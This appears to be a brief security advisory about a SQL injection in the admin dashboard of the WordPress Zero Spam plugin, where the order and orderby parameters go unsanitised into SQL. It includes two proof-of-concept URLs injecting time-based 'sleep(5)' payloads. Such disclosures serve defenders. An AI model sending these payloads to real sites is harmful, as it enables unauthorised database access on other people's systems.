The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection
With at least one IP in the “Blocked IPs” list:
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)